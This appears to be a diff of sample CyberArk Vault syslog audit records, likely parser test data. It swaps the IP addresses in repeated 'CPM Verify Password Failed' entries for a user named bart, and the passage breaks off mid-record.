-<7>1 2021-03-15T13:19:58Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:19:58</Timestamp>\n    <IsoTimestamp>2021-03-15T13:19:58Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=34.66.114.180;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814397\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:19:58","IsoTimestamp":"2021-03-15T13:19:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;username=ELASTIC\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814397"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<7>1 2021-03-15T13:25:32Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:25:32</Timestamp>\n    <IsoTimestamp>2021-03-15T13:25:32Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \n</Reason>\n    <ExtraDetails>address=34.66.114.180;username=bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814709\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"UserDN\" Value=\"ELASTIC.local\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:25:32","IsoTimestamp":"2021-03-15T13:25:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \n","ExtraDetails":"address=34.66.114.180;username=bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814709"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"UserDN","Value":"ELASTIC.local"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<7>1 2021-03-15T13:33:26Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:33:26</Timestamp>\n    <IsoTimestamp>2021-03-15T13:33:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=34.66.114.180;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615815206\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:33:26","IsoTimestamp":"2021-03-15T13:33:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615815206"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<7>1 2021-03-15T15:04:11Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 08:04:11</Timestamp>\n    <IsoTimestamp>2021-03-15T15:04:11Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=1;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"1\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615820651\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 08:04:11","IsoTimestamp":"2021-03-15T15:04:11Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #1). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=1;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615820651"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
-<7>1 2021-03-15T16:35:01Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 09:35:01</Timestamp>\n    <IsoTimestamp>2021-03-15T16:35:01Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=34.66.114.180;retriescount=2;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"2\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615826099\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 09:35:01","IsoTimestamp":"2021-03-15T16:35:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask,Failure. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #2). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;retriescount=2;username=ELASTIC.local\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC.local\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"2"},{"Name":"LastFailDate","Value":"1615826099"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<7>1 2021-03-15T13:19:58Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:19:58</Timestamp>\n    <IsoTimestamp>2021-03-15T13:19:58Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=81.2.69.143;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814397\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 81.2.69.143\\ELASTIC\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:19:58","IsoTimestamp":"2021-03-15T13:19:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=81.2.69.143;username=ELASTIC\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"81.2.69.143"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814397"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"81.2.69.143"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 81.2.69.143\\ELASTIC\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}}
+<7>1 2021-03-15T13:25:32Z VAULT {"format":"elastic","version":"1.0","raw":"<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:25:32</Timestamp>\n    <IsoTimestamp>2021-03-15T13:25:32Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The network name cannot be found. (winRc=67). \n</Reason>\n    <ExtraDetails>address=81.2.69.143;username=bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814709\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"UserDN\" Value=\"ELASTIC.local\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 81.2.69.143\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The network name cannot be found. (winRc=67). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:25:32","IsoTimestamp":"2021-03-15T13:25:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The network name cannot be found. (winRc=67). \n","ExtraDetails":"address=81.2.69.143;username=bart;","Message":"CPM Verify Password 